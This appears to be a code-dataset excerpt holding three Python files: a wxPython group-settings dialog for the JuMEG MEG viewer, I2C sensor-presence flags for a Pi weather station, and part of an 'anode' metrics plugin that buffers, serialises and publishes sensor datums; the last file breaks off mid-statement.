id (string, lengths 1-265) | text (string, lengths 6-5.19M) | dataset_id (7 classes)
id: 144730 | dataset_id: StarcoderdataPython

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#--------------------------------------------
# Authors: <NAME> <<EMAIL>>
#
#--------------------------------------------
# Date: 05.09.19
#--------------------------------------------
# License: BSD (3-clause)
#--------------------------------------------
# Updates
#--------------------------------------------
import numpy as np
import wx
import sys,logging
from jumeg.base import jumeg_logger
logger = logging.getLogger('jumeg')
from jumeg.gui.wxlib.utils.jumeg_gui_wxlib_utils_controls import JuMEG_wxControlGrid
from jumeg.gui.tsv.wxutils.jumeg_tsv_wxutils import DLGButtonPanel
__version__="2019-09-13-001"
LEA = wx.ALIGN_LEFT | wx.EXPAND | wx.ALL
class PopupColourTable(wx.PopupTransientWindow):
def __init__(self, parent,**kwargs):
super().__init__(parent,wx.NO_BORDER)
self._wx_init(**kwargs)
self._ApplyLayout()
def _wx_init(self,**kwargs):
self.SetBackgroundColour(kwargs.get("bg","GREY60"))
w = kwargs.get("w",24)
self._C = kwargs.get("colours")
self._caller = kwargs.get("caller")
self._callback = kwargs.get("callback")
self._title = kwargs.get("title","JuMEG Select Colour")
self._colour_text = None
bmp = wx.Bitmap()
ctrls = []
for i in range( self._C.n_colours ):
#--- select colour
ctrls.append( ["BTBMP",self._C.labels[i],bmp,(w,w),wx.NO_BORDER|wx.BU_NOTEXT,self._C.colours[i] ,self._C.labels[i],self.ClickOnCtrls] )
#--- calc cols for grid
n_cols,rest = divmod( len(ctrls),4)
if rest: n_cols += 1
self._pnl = JuMEG_wxControlGrid(self,label= self._title,control_list=ctrls,cols=n_cols,set_ctrl_prefix=False)
def ClickOnCtrls(self,evt):
obj = evt.GetEventObject()
try:
if obj.GetToolTip():
self._colour_text = obj.GetToolTipText()
#--- call the caller-function in parent
if self._colour_text:
self._callback( self._caller,self._colour_text )
#--- close
self.Dismiss() # close it
except Exception:
logger.exception("---> ERROR cannot set ToolTip: {}".format(self._colour_text))
def _ApplyLayout(self):
vbox = wx.BoxSizer(wx.VERTICAL)
vbox.Add(self._pnl,1,LEA,2)
self.SetAutoLayout(True)
self.SetSizer(vbox)
self.Fit()
self.Layout()
class GroupDLG(wx.Dialog):
"""
Example:
---------
input group dict
labels = ['grad','mag','eeg','stim','eog','emg','ecg','ref_meg']
grp={
'mag': {"selected":True,"colour":"RED", "prescale":200,"unit":"fT"},
'grad': {"selected":True,"colour":"BLUE", "prescale":200,"unit":"fT"},
'ref_meg':{"selected":True,"colour":"GREEN", "prescale":2, "unit":"pT"},
'eeg': {"selected":True,"colour":"BLUE", "prescale":1, "unit":"uV"},
'eog': {"selected":True,"colour":"PURPLE", "prescale":100,"unit":"uV"},
'emg': {"selected":True,"colour":"DARKORANGE","prescale":100,"unit":"uV"},
'ecg': {"selected":True,"colour":"DARKGREEN", "prescale":100,"unit":"mV"},
'stim': {"selected":True,"colour":"CYAN", "prescale":1, "unit":"bits"}
}
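
Usage (a minimal sketch; assumes a GroupOptions-like object such as the one
built in the __main__ test block at the bottom of this file):

    app = wx.App()
    dlg = GroupDLG(None, grp=GroupOptions())
    if dlg.ShowModal() == wx.ID_APPLY:
        grp = dlg.Group.GetGroup(None)
    dlg.Destroy()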
"""
@property
def Group(self): return self._GRP
def __init__(self,parent,**kwargs):
style=wx.CLOSE_BOX|wx.MAXIMIZE_BOX|wx.MINIMIZE_BOX |wx.RESIZE_BORDER
super().__init__(parent,title="JuMEG Group Settings",style=style)
self._init(**kwargs)
def _init(self,**kwargs):
self._GRP = kwargs.get("grp")
self._wx_init(**kwargs)
self._wx_button_box()
self._ApplyLayout()
def _wx_button_box(self):
"""
show the dialog button panel with Cancel and Apply buttons
:return:
"""
self._pnl_button_box = DLGButtonPanel(self,style=wx.SUNKEN_BORDER)
def _wx_init(self,**kwargs):
w = kwargs.get("w",24)
self.SetBackgroundColour(kwargs.get("bg","GREY90"))
self.SetMinSize(( 620,400) )
# self._bt=wx.Button(self,-1,"TEST")
bmp = wx.Bitmap()
ctrls = [ ["STXT","Groups","Groups"], ["STXT","Colour","Colour"], ["STXT","Scale","Scale/Div"],[ "STXT","Unit","Unit"],["STXT","Scale Mode","Scale Mode"],["STXT","DC Offset","DC Offset"]]
n_cols= len(ctrls)
for grp in self._GRP.labels:
g = grp.upper()
#--- ckbutton select group
ctrls.append( ["CK", g+".SELECTED",g,self._GRP.GetSelected(grp),'de/select group',self.ClickOnCtrls] )
#--- select colour
label = self._GRP.GetColour(grp)
ctrls.append( ["BTBMP",g+".colour",bmp,(w,w),wx.NO_BORDER|wx.BU_NOTEXT,label,label +"\nclick to change",self.ClickOnCtrls] )
#--- grp prescale
ctrls.append(["COMBO",g.upper()+".PRESCALE",str(self._GRP.GetPreScale(grp)),self._GRP.Unit.prescales,'set scaling',self.ClickOnCtrls])
#--- grp unit with prefix e.g. m,u,n,p,f,a => mT,uT,...
self._GRP.Unit.unit = self._GRP.GetUnit(grp) # update Unit CLS
ctrls.append(["COMBO",g+".UNIT",self._GRP.Unit.unit,self._GRP.Unit.GetUnits(),'set scaling unit',self.ClickOnCtrls])
#--- grp scale mode
m = self._GRP.ScaleModes[ self._GRP.GetScaleMode(grp) ]
ctrls.append( ["COMBO",g.upper() + ".SCALE",m,self._GRP.ScaleModes,'scale on Custom or MinMax',self.ClickOnScaleMode])
#--- combo select DCoffset
# ctrls.append( ["CK", g+".DCOFFSET","",self._GRP.GetDCoffset(grp),'DC Offset',self.ClickOnCtrls] )
m = self._GRP.DCOffsetModes[ self._GRP.GetDCOffsetMode(grp) ]
ctrls.append( ["COMBO",g.upper() + ".DCOFFSET",m,self._GRP.DCOffsetModes,'DC Offset Modes e.g.: [None,Global,Time Window]',self.ClickOnCtrls])
self._pnl_groups = JuMEG_wxControlGrid(self,label="Group Parameter",control_list=ctrls,cols=n_cols,set_ctrl_prefix=False,AddGrowableCol=[2,3,4,5])
#self._bt.Bind(wx.EVT_BUTTON,self.ClickOnButton)
def _popup_colour_table(self,obj,grp):
PCT = PopupColourTable(self,title="Group: "+obj.GetName().split(".")[0],caller=obj,colours=self._GRP.Colour,callback=self.update_colour)
pos = wx.GetMousePosition()
PCT.Position(pos,(0,0))
PCT.Popup()
def update_colour(self,obj,label):
"""
sets the group colour
this is the callback executed from PopupColourTable
(could alternatively be wired up via wx events or pubsub)
:param obj: colour bitmap button
:param label: colour label (e.g. RED, GREEN); has to be in the colour-object label list
:return:
"""
grp,key = obj.GetName().lower().split(".")
c = self._GRP.Colour.label2colour(label)
obj.SetBackgroundColour( c )
obj.SetToolTipString( label+"\nclick to change")
self._GRP.SetColour( grp, label )
# logger.info("set group: {} colour: {}".format(grp,self._GRP.GetGroup(grp) ))
def ClickOnScaleMode(self,evt):
"""
update the scale mode in the group object
if the selected mode is <division>, enable the "PRESCALE" and "UNIT" controls,
otherwise disable them
:param evt:
:return:
"""
obj = evt.GetEventObject()
grp,key = obj.GetName().lower().split(".")
idx = obj.GetSelection()
self._GRP.SetScaleMode(grp,idx)
for label in ["PRESCALE","UNIT"]:
w = self.FindWindowByName(grp.upper() + "." + label)
w.Enable( not bool(idx) )
def ClickOnCtrls(self,evt):
obj = evt.GetEventObject()
grp,key = obj.GetName().lower().split(".")
if key == "colour":
self._popup_colour_table(obj,grp)
return
v = obj.GetValue()
if key == "selected":
self._GRP.SetSelected(grp,v )
elif key == "prescale":
self._GRP.SetPreScale(grp,v)
elif key == "unit":
self._GRP.SetUnit(grp,v)
elif key =="dcoffset":
self._GRP.SetDCOffsetMode(grp,obj.GetSelection())
def ClickOnButton(self,evt):
pass
def _ApplyLayout(self):
vbox = wx.BoxSizer(wx.VERTICAL)
#vbox.Add(self._bt,0,LEA,2)
vbox.Add(self._pnl_groups,1,LEA,2)
#--- fix size to show combos of scale and unit
stl = wx.StaticLine(self,size=(520,2) )
stl.SetBackgroundColour("GREY85")
vbox.Add(stl,0,LEA,1)
vbox.Add(self._pnl_button_box,0,LEA,2)
self.SetAutoLayout(True)
self.SetSizer(vbox)
self.Fit()
self.Layout()
class ChannelDLG(GroupDLG):
def __init__(self,**kwargs):
super().__init__(**kwargs)
class MainFrame(wx.Frame):
def __init__(self, parent, title,**kwargs):
super().__init__(parent, title = title)
self._init(**kwargs)
self._ApplyLayout()
def _init(self,**kwargs):
self.test = wx.Panel(self)
self.show_group_dialog(**kwargs)
self.Close()
def _ApplyLayout(self):
vbox = wx.BoxSizer(wx.VERTICAL)
vbox.Add(self.test,1,LEA,4)
self.SetSizer(vbox)
self.SetAutoLayout(True)
self.Fit()
self.Show(True)
def show_group_dialog(self,**kwargs):
dlg = GroupDLG(self,**kwargs)
out = dlg.ShowModal()
if out == wx.ID_APPLY:
grp = dlg.Group.GetGroup(None)
for g in grp.keys():
logger.info("OUTPUT: {} => {} \n {}".format(g,dlg.Group.GetScaling(g),grp.get(g)))
dlg.Destroy()
if __name__ == "__main__":
opt=None
#--- Testing DEBUG
from tsv.utils.jumeg_tsv_utils_io_data import JuMEG_TSV_Utils_IO_Data
from tsv.plot.jumeg_tsv_plot2d_data_options import JuMEG_TSV_PLOT2D_DATA_OPTIONS,GroupOptions
# from tsv.wxutils.jumeg_tsv_wxutils_dlg_settings import GroupDLG,ChannelDLG
verbose = True
path = "data"
path = "~/MEGBoers/programs/JuMEG/jumeg-py/jumeg-py-git-fboers-2019-08-21/projects/JuMEGTSV/data"
fname = '200098_leda_test_10_raw.fif'
raw = None
jumeg_logger.setup_script_logging(name="JuMEG",opt=opt,logger=logger)
IO = JuMEG_TSV_Utils_IO_Data()
raw,bads = IO.load_data(raw,fname,path)
#--- ToDo use only groups from raw
GRP = GroupOptions()
DOpt = JuMEG_TSV_PLOT2D_DATA_OPTIONS(raw=raw)
DOpt.update(verbose=True,debug=True)
app = wx.App()
MainFrame(None,'JuMEG demo',grp=GRP)
app.MainLoop()

id: 188115 | dataset_id: StarcoderdataPython

<reponame>henryse/pi-weather-pro
# device present global variables
DS3231_Present = False
BMP280_Present = False
AM2315_Present = False
ADS1015_Present = False
ADS1115_Present = False
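
# A possible way these flags are set and used (a sketch only, not part of the original
# module): probe the I2C bus at each device's address and guard every sensor read on the
# corresponding flag, e.g.
#
#     import smbus
#     bus = smbus.SMBus(1)              # Raspberry Pi I2C bus 1 (assumption)
#     try:
#         bus.read_byte(0x76)           # BMP280 usually answers at 0x76 or 0x77
#         BMP280_Present = True
#     except IOError:
#         BMP280_Present = False
#     if BMP280_Present:
#         pass                          # safe to read temperature/pressure here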

id: 3292861

<filename>asystem-anode/src/main/python/anode/plugin/plugin.py
from __future__ import print_function
import HTMLParser
import StringIO
import abc
import base64
import calendar
import datetime
import decimal
import io
import json
import logging
import numbers
import operator
import os.path
import re
import shutil
import time
import urllib
from StringIO import StringIO
from collections import deque
from decimal import Decimal
from functools import reduce
from importlib import import_module
from uuid import getnode as get_mac
import avro
import avro.io
import avro.schema
import dill
import matplotlib
import matplotlib.pyplot as plot
import numpy
import pandas
import treq
import xmltodict
from avro.io import AvroTypeException
from cycler import cycler
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
from sklearn.externals import joblib
from twisted.internet.task import Clock
from twisted_s3 import auth
import anode
import anode.plugin
from anode.application import *
# noinspection PyTypeChecker,PyUnboundLocalVariable
class Plugin(object):
def poll(self):
if self.has_poll:
log_timer = anode.Log(logging.DEBUG).start()
self._poll()
log_timer.log("Plugin", "timer", lambda: "[{}]".format(self.name), context=self.poll)
def push(self, content, targets=None):
if self.has_push:
log_timer = anode.Log(logging.DEBUG).start()
self._push(content, targets)
log_timer.log("Plugin", "timer", lambda: "[{}]".format(self.name), context=self.push)
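# Re-emit the last datum seen for every metric/type/unit/bin as a "repeat" datum once
# "repeat_seconds" have elapsed (or unconditionally when force=True, in which case the bin
# timestamp is aligned to the history partition boundary and integral values are reset to 0),
# refresh derived max/min datums whose bin period has expired, then publish.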
def repeat(self, force=False):
log_timer = anode.Log(logging.DEBUG).start()
for datum_metric in self.datums:
for datum_type in self.datums[datum_metric]:
for datum_unit in self.datums[datum_metric][datum_type]:
for datum_bin in self.datums[datum_metric][datum_type][datum_unit]:
datums = self.datums[datum_metric][datum_type][datum_unit][datum_bin]
if DATUM_QUEUE_LAST in datums and DATUM_QUEUE_HISTORY in datums:
datum = datums[DATUM_QUEUE_LAST]
if datum["data_temporal"] != "derived":
datum_bin_timestamp = self.get_time()
if force and "history_partition_seconds" in self.config and self.config["history_partition_seconds"] > 0:
datum_bin_timestamp = self.get_time_period(datum_bin_timestamp, Plugin.get_seconds(
self.config["history_partition_seconds"], "second"))
if force or ((24 * 60 * 60) > (datum_bin_timestamp - datum["bin_timestamp"]) >= (
self.config["repeat_seconds"] - 5)):
def expired_max_min(max_or_min):
if max_or_min in self.datums[datum_metric][datum_type][datum_unit][datum_bin]:
if force or datums[max_or_min]["bin_timestamp"] < \
self.get_time_period(self.get_time(),
Plugin.get_seconds(datums[max_or_min]["bin_width"],
datums[max_or_min]["bin_unit"])):
return True
return False
datum_value = datum["data_value"]
if force and "history_partition_seconds" in self.config and self.config[
"history_partition_seconds"] > 0 and \
Plugin.get_seconds(datum["bin_width"], datum["bin_unit"]) == \
Plugin.get_seconds(self.config["history_partition_seconds"], "second"):
if datum["data_type"] == "integral":
datum_value = 0
if datum_value is not None:
self.datum_push(
datum["data_metric"],
"forecast" if datum["data_temporal"] == "forecast" else "repeat", datum["data_type"],
datum_value,
datum["data_unit"],
datum["data_scale"],
datum["data_timestamp"],
datum_bin_timestamp,
datum["bin_width"],
datum["bin_unit"],
data_string=datum["data_string"] if "data_string" in datum else None,
data_derived_max=expired_max_min(DATUM_QUEUE_MAX),
data_derived_min=expired_max_min(DATUM_QUEUE_MIN),
data_derived_force=force,
data_push_force=True
)
self.publish()
log_timer.log("Plugin", "timer", lambda: "[{}]".format(self.name), context=self.repeat)
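# Push this plugin's self-monitoring datums (metric count, buffer/history/partition fill
# percentages, publish queue depth, uptime and last-seen time) as transient datums, then
# drain the per-bin publish queues to the configured "publish_service" (when connected) on
# the batch datum topic, re-queueing any message that fails to publish.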
def publish(self):
metric_name = "anode__" + self.name + "__"
time_now = self.get_time()
metrics_count = sum(len(units)
for metrics in self.datums.values()
for types in metrics.values()
for units in types.values())
self.datum_push(
metric_name + "metrics",
"current", "point",
self.datum_value(metrics_count),
"scalar",
1,
time_now,
time_now,
self.config["poll_seconds"],
"second",
data_bound_lower=0,
data_transient=True
)
datums_buffer_count = sum(len(bins[DATUM_QUEUE_BUFFER])
for metrics in self.datums.values()
for types in metrics.values()
for units in types.values()
for bins in units.values())
self.datum_push(
metric_name + "buffer",
"current", "point",
self.datum_value(0 if metrics_count == 0 else (float(datums_buffer_count) / (self.datums_buffer_batch * metrics_count) * 100)),
"_P25",
1,
time_now,
time_now,
self.config["poll_seconds"],
"second",
data_bound_upper=100,
data_bound_lower=0,
data_transient=True
)
datums_count = sum(0 if DATUM_QUEUE_HISTORY not in bins else (
sum(len(partitions["data_df"].index) for partitions in bins[DATUM_QUEUE_HISTORY].values()))
for metrics in self.datums.values()
for types in metrics.values()
for units in types.values()
for bins in units.values())
self.datum_push(
metric_name + "history",
"current", "point",
self.datum_value(0 if ("history_ticks" not in self.config or self.config["history_ticks"] < 1) else (
float(datums_count) / self.config["history_ticks"] * 100)),
"_P25",
1,
time_now,
time_now,
self.config["poll_seconds"],
"second",
data_bound_upper=100,
data_bound_lower=0,
data_transient=True
)
partitions_count_max = 0 if len(self.datums) == 0 else (max(0 if DATUM_QUEUE_HISTORY not in bins else (
len(bins[DATUM_QUEUE_HISTORY]))
for metrics in self.datums.values()
for types in metrics.values()
for units in types.values()
for bins in units.values()))
self.datum_push(
metric_name + "partitions",
"current", "point",
self.datum_value(0 if ("history_partitions" not in self.config or self.config["history_partitions"] < 1) else (
float(partitions_count_max) / self.config["history_partitions"] * 100)),
"_P25",
1,
time_now,
time_now,
self.config["poll_seconds"],
"second",
data_bound_upper=100,
data_bound_lower=0,
data_transient=True
)
self.datum_push(
metric_name + "up_Dtime",
"current", "point",
self.datum_value((time_now - self.time_boot) / Decimal(24 * 60 * 60), factor=100),
"d",
100,
time_now,
time_now,
self.config["poll_seconds"],
"second",
data_bound_lower=0,
data_transient=True
)
self.datum_push(
metric_name + "last_Dseen",
"current", "point",
self.datum_value(self.time_seen),
"scalar",
1,
time_now,
time_now,
self.config["poll_seconds"],
"second",
data_transient=True
)
datums_publish_pending = 0
publish_service = self.config["publish_service"] if "publish_service" in self.config else None
publish_batch_datum_topic = self.config["publish_batch_datum_topic"] if "publish_batch_datum_topic" in self.config else None
for datum_metric in self.datums:
for datum_type in self.datums[datum_metric]:
for datum_unit in self.datums[datum_metric][datum_type]:
for datum_bin in self.datums[datum_metric][datum_type][datum_unit]:
datums_publish = self.datums[datum_metric][datum_type][datum_unit][datum_bin][DATUM_QUEUE_PUBLISH]
datums_publish_len = len(datums_publish)
if publish_service is not None and publish_batch_datum_topic is not None:
if publish_service.isConnected():
for index in xrange(datums_publish_len):
datum_avro = datums_publish.popleft()
anode.Log(logging.DEBUG).log("Plugin", "state",
lambda: "[{}] publishing datum [{}] datum [{}] of [{}]".format(
self.name, self.datum_tostring(self.datum_avro_to_dict(datum_avro)[0]),
index + 1, datums_publish_len))
publish_service.publishMessage(publish_batch_datum_topic + PUBLISH_BATCH_TOPIC,
datum_avro, datums_publish, 1, False, lambda failure, message, queue: (
anode.Log(logging.WARN).log("Plugin", "state", lambda:
"[{}] publish failed datum [{}] with reason {}".format(
self.name, self.datum_tostring(self.datum_avro_to_dict(datum_avro)[0]),
str(failure).replace("\n", ""))), queue.appendleft(message)))
elif publish_service is None:
datums_publish.clear()
datums_publish_pending += len(datums_publish)
self.datum_push(
metric_name + "queue",
"current", "point",
self.datum_value(datums_publish_pending),
"datums",
1,
time_now,
time_now,
self.config["poll_seconds"],
"second",
data_bound_lower=0,
data_transient=True
)
anode.Log(logging.INFO).log("Plugin", "state", lambda: "[{}] published [{}] datums".format(self.name, datums_publish_pending))
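# Record a single datum: clamp its value to the optional upper/lower bounds, serialise it
# to Avro, deduplicate it against the last value seen for its metric/type/unit/bin, track
# derived high/low datums over the derived period, append it to the publish queue and the
# in-memory history buffer (unless transient), hand it to the ANode core and, for
# non-internal metrics, push it to the MQTT-style publish service together with a one-off
# metadata/discovery message per datum GUID.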
def datum_push(self, data_metric, data_temporal, data_type, data_value, data_unit, data_scale, data_timestamp, bin_timestamp, bin_width,
bin_unit, asystem_version=None, data_version=None, data_string=None, data_bound_upper=None, data_bound_lower=None,
data_derived_max=False, data_derived_min=False, data_derived_period=1, data_derived_unit="day",
data_derived_force=False, data_push_force=False, data_transient=False):
log_timer = anode.Log(logging.DEBUG).start()
if data_value is not None:
datum_dict = {
"asystem_version": APP_VERSION_NUMERIC if asystem_version is None else Plugin.datum_version_encode(asystem_version),
"data_version": 0 if data_version is None else Plugin.datum_version_encode(data_version, 1000),
"data_source": self.name,
"data_metric": data_metric,
"data_temporal": data_temporal,
"data_type": data_type,
"data_value": data_value,
"data_unit": data_unit,
"data_scale": data_scale,
"data_string": data_string,
"data_timestamp": data_timestamp,
"bin_timestamp": bin_timestamp,
"bin_width": bin_width,
"bin_unit": bin_unit
}
if data_bound_upper is not None and data_value > Decimal(data_bound_upper * data_scale):
datum_dict["data_value"] = data_bound_upper * data_scale
anode.Log(logging.DEBUG).log("Plugin", "state",
lambda: "[{}] upperbounded datum [{}]".format(self.name, self.datum_tostring(datum_dict)))
if data_bound_lower is not None and data_value < Decimal(data_bound_lower * data_scale):
datum_dict["data_value"] = data_bound_lower * data_scale
anode.Log(logging.DEBUG).log("Plugin", "state",
lambda: "[{}] lowerbounded datum [{}]".format(self.name, self.datum_tostring(datum_dict)))
try:
datum_avro = self.datum_dict_to_avro(datum_dict)[0]
except AvroTypeException as exception:
anode.Log(logging.ERROR).log("Plugin", "error",
lambda: "[{}] error serialising Avro object [{}]".format(self.name, datum_dict), exception)
return
if datum_dict["data_metric"] not in self.datums:
self.datums[datum_dict["data_metric"]] = {}
if datum_dict["data_type"] not in self.datums[datum_dict["data_metric"]]:
self.datums[datum_dict["data_metric"]][datum_dict["data_type"]] = {}
if datum_dict["data_unit"] not in self.datums[datum_dict["data_metric"]][datum_dict["data_type"]]:
self.datums[datum_dict["data_metric"]][datum_dict["data_type"]][datum_dict["data_unit"]] = {}
if str(datum_dict["bin_width"]) + datum_dict["bin_unit"] not in \
self.datums[datum_dict["data_metric"]][datum_dict["data_type"]][datum_dict["data_unit"]]:
self.datums[datum_dict["data_metric"]][datum_dict["data_type"]][datum_dict["data_unit"]][
str(datum_dict["bin_width"]) + datum_dict["bin_unit"]] = {
DATUM_QUEUE_PUBLISH: deque(maxlen=(None if "publish_ticks" not in self.config or self.config["publish_ticks"] < 1
else self.config["publish_ticks"])), DATUM_QUEUE_BUFFER: deque()}
if not data_transient:
self.datums[datum_dict["data_metric"]][datum_dict["data_type"]][datum_dict["data_unit"]][
str(datum_dict["bin_width"]) + datum_dict["bin_unit"]][DATUM_QUEUE_HISTORY] = {}
datums_deref = self.datums[datum_dict["data_metric"]][datum_dict["data_type"]][datum_dict["data_unit"]][
str(datum_dict["bin_width"]) + datum_dict["bin_unit"]]
if DATUM_QUEUE_LAST not in datums_deref or datums_deref[DATUM_QUEUE_LAST]["data_value"] != datum_dict["data_value"] or \
datums_deref[DATUM_QUEUE_LAST]["data_unit"] != datum_dict["data_unit"] or \
datums_deref[DATUM_QUEUE_LAST]["data_scale"] != datum_dict["data_scale"] or \
("data_string" in datums_deref[DATUM_QUEUE_LAST] and
datums_deref[DATUM_QUEUE_LAST]["data_string"] != datum_dict["data_string"]) or \
("repeat_partition" in self.config and self.config["repeat_partition"] and
self.get_time_period(datums_deref[DATUM_QUEUE_LAST]["bin_timestamp"],
self.config["history_partition_seconds"]) !=
self.get_time_period(datum_dict["bin_timestamp"],
self.config["history_partition_seconds"])) or data_push_force:
self.time_seen = self.get_time()
datums_deref[DATUM_QUEUE_LAST] = datum_dict
bin_timestamp_derived = self.get_time_period(datum_dict["bin_timestamp"],
Plugin.get_seconds(data_derived_period, data_derived_unit))
if not data_transient:
if data_derived_max:
if DATUM_QUEUE_MAX not in datums_deref or datums_deref[DATUM_QUEUE_MAX]["bin_timestamp"] < bin_timestamp_derived \
or datums_deref[DATUM_QUEUE_MAX]["data_value"] < datum_dict["data_value"] or data_derived_force:
datums_deref[DATUM_QUEUE_MAX] = datum_dict.copy()
datums_deref[DATUM_QUEUE_MAX]["bin_type"] = "high"
datums_deref[DATUM_QUEUE_MAX]["bin_timestamp"] = bin_timestamp_derived
datums_deref[DATUM_QUEUE_MAX]["bin_width"] = data_derived_period
datums_deref[DATUM_QUEUE_MAX]["bin_unit"] = data_derived_unit
anode.Log(logging.DEBUG).log("Plugin", "state", lambda: "[{}] selected high [{}]".format(
self.name, self.datum_tostring(datums_deref[DATUM_QUEUE_MAX])))
self.datum_push(data_metric, "derived", "high", datum_dict["data_value"], data_unit, data_scale,
datum_dict["data_timestamp"], datums_deref[DATUM_QUEUE_MAX]["bin_timestamp"],
datum_dict["bin_width"] if datum_dict["data_type"] == "integral"
else data_derived_period, datum_dict["bin_unit"] if datum_dict["data_type"] == "integral"
else data_derived_unit, asystem_version=asystem_version, data_version=data_version,
data_derived_force=data_derived_force, data_push_force=data_push_force,
data_transient=data_transient)
if data_derived_min:
if DATUM_QUEUE_MIN not in datums_deref or datums_deref[DATUM_QUEUE_MIN]["bin_timestamp"] < bin_timestamp_derived \
or datums_deref[DATUM_QUEUE_MIN]["data_value"] > datum_dict["data_value"] or data_derived_force:
datums_deref[DATUM_QUEUE_MIN] = datum_dict.copy()
datums_deref[DATUM_QUEUE_MIN]["bin_type"] = "low"
datums_deref[DATUM_QUEUE_MIN]["bin_timestamp"] = bin_timestamp_derived
datums_deref[DATUM_QUEUE_MIN]["bin_width"] = data_derived_period
datums_deref[DATUM_QUEUE_MIN]["bin_unit"] = data_derived_unit
anode.Log(logging.DEBUG).log("Plugin", "state",
lambda: "[{}] selected low [{}]".format(self.name,
self.datum_tostring(
datums_deref[DATUM_QUEUE_MIN])))
self.datum_push(data_metric, "derived", "low", datum_dict["data_value"], data_unit, data_scale,
datum_dict["data_timestamp"], datums_deref[DATUM_QUEUE_MIN]["bin_timestamp"],
datum_dict["bin_width"] if datum_dict["data_type"] == "integral"
else data_derived_period, datum_dict["bin_unit"] if datum_dict["data_type"] == "integral"
else data_derived_unit, asystem_version=asystem_version, data_version=data_version,
data_derived_force=data_derived_force, data_push_force=data_push_force,
data_transient=data_transient)
if not datum_dict["data_temporal"] == "derived":
datums_deref[DATUM_QUEUE_PUBLISH].append(datum_avro)
if "history_ticks" in self.config and self.config["history_ticks"] > 0 and \
"history_partitions" in self.config and self.config["history_partitions"] > 0 and \
"history_partition_seconds" in self.config and self.config["history_partition_seconds"] > 0:
bin_timestamp_partition = self.get_time_period(datum_dict["bin_timestamp"],
self.config["history_partition_seconds"])
if len(datums_deref[DATUM_QUEUE_BUFFER]) == self.datums_buffer_batch or bin_timestamp_partition \
not in datums_deref[DATUM_QUEUE_HISTORY]:
self.datum_merge_buffer_history(datums_deref[DATUM_QUEUE_BUFFER], datums_deref[DATUM_QUEUE_HISTORY])
datums_deref[DATUM_QUEUE_BUFFER].append(datum_dict)
anode.Log(logging.DEBUG).log("Plugin", "state",
lambda: "[{}] saved datum [{}]".format(self.name, self.datum_tostring(datum_dict)))
anode.Log(logging.DEBUG).log("Plugin", "state",
lambda: "[{}] pushed datum [{}]".format(self.name, self.datum_tostring(datum_dict)))
self.anode.push_datums({"dict": [datum_dict]})
if not datum_dict["data_metric"].startswith("anode") and \
datum_dict["data_type"] != "low" and \
datum_dict["data_type"] != "high" and \
datum_dict["bin_unit"] != "all_Dtime":
publish_service = self.config["publish_service"] if "publish_service" in self.config else None
publish_push_data_topic = self.config["publish_push_data_topic"] \
if "publish_push_data_topic" in self.config else None
publish_push_metadata_topic = self.config["publish_push_metadata_topic"] \
if "publish_push_metadata_topic" in self.config else None
# TODO: Complete publish service
if publish_service is not None and publish_push_data_topic is not None and publish_push_metadata_topic is not None:
if publish_service.isConnected():
datum_dict_decoded = Plugin.datum_decode(datum_dict)
datum_id = Plugin.datum_encode_id(datum_dict)
datum_guid = Plugin.datum_encode_guid(datum_dict)
datum_name = Plugin.datum_decode_label(datum_dict_decoded)
datum_data_topic = "{}/sensor/anode/{}/state".format(publish_push_data_topic, datum_id)
if datum_guid in PUBLISH_METADATA_CACHE and PUBLISH_METADATA_CACHE[datum_guid] != datum_id:
anode.Log(logging.ERROR).log("Plugin", "error",
lambda: "[{}] attempting to publish datum with GUID [{}] and ID [{}] "
"when previously published with ID [{}]".format(
self.name, datum_guid, datum_id, PUBLISH_METADATA_CACHE[datum_guid]))
if datum_guid not in PUBLISH_METADATA_CACHE:
datum_metadata_topic = "{}/sensor/anode/{}/config".format(publish_push_metadata_topic, datum_id)
datum_metadata = {
"unique_id": datum_id,
"name": datum_name,
"value_template": "{{value_json.value}}",
"unit_of_measurement": datum_dict_decoded["data_unit"],
"device": {
"name": "ANode",
"model": "ASystem",
"manufacturer": "<NAME>",
"identifiers": ID_HEX,
"connections": [["mac", ID_HEX_STRING]],
"sw_version": APP_MODEL_VERSION
},
"qos": 1,
"state_topic": datum_data_topic
}
publish_service.publishMessage(datum_metadata_topic, json.dumps(datum_metadata), None, 1, True,
lambda failure, message, queue: (
anode.Log(logging.WARN).log("Plugin", "state", lambda:
"[{}] publish failed datum metadata [{}] with reason {}".format(
self.name, datum_metadata, str(failure).replace("\n", ""))), None))
PUBLISH_METADATA_CACHE[datum_guid] = datum_id
datum_data = {"value": float(int(datum_dict["data_value"]) / Decimal(datum_dict["data_scale"]))}
publish_service.publishMessage(datum_data_topic, json.dumps(datum_data), None, 1, False,
lambda failure, message, queue: (
anode.Log(logging.WARN).log("Plugin", "state", lambda:
"[{}] publish failed datum data [{}] with reason {}".format(
self.name, datum_data, str(failure).replace("\n", ""))), None))
else:
anode.Log(logging.DEBUG).log("Plugin", "state",
lambda: "[{}] dropped datum [{}]".format(self.name, self.datum_tostring(datum_dict)))
log_timer.log("Plugin", "timer", lambda: "[{}]".format(self.name), context=self.datum_push)
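# Flush the in-memory datum buffer into the partitioned history: group buffered datums by
# their history partition timestamp, convert each group to a pandas DataFrame and
# concatenate it onto the partition's existing frame, then purge partitions that fall
# outside the configured "history_partitions"/"history_ticks" retention limits.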
def datum_merge_buffer_history(self, datums_buffer, datums_history):
log_timer = anode.Log(logging.DEBUG).start()
if "history_ticks" in self.config and self.config["history_ticks"] > 0 and \
"history_partitions" in self.config and self.config["history_partitions"] > 0 and \
"history_partition_seconds" in self.config and self.config["history_partition_seconds"] > 0:
bin_timestamp_partition_max = None
if len(datums_buffer) > 0:
datums_buffer_partition = {}
for datum in datums_buffer:
bin_timestamp_partition = self.get_time_period(datum["bin_timestamp"], self.config["history_partition_seconds"])
bin_timestamp_partition_max = bin_timestamp_partition if \
(bin_timestamp_partition_max is None or bin_timestamp_partition_max < bin_timestamp_partition) else \
bin_timestamp_partition_max
if bin_timestamp_partition not in datums_buffer_partition:
datums_buffer_partition[bin_timestamp_partition] = []
datums_buffer_partition[bin_timestamp_partition].append(datum)
for bin_timestamp_partition, datums in datums_buffer_partition.iteritems():
datums_df = self.datums_dict_to_df(datums)
if len(datums_df) != 1:
raise ValueError("Assertion error merging mixed datum types when there should not be any!")
datums_df = datums_df[0]
if bin_timestamp_partition not in datums_history:
datums_history[bin_timestamp_partition] = datums_df
else:
datums_history[bin_timestamp_partition]["data_df"] = pandas.concat(
[datums_history[bin_timestamp_partition]["data_df"],
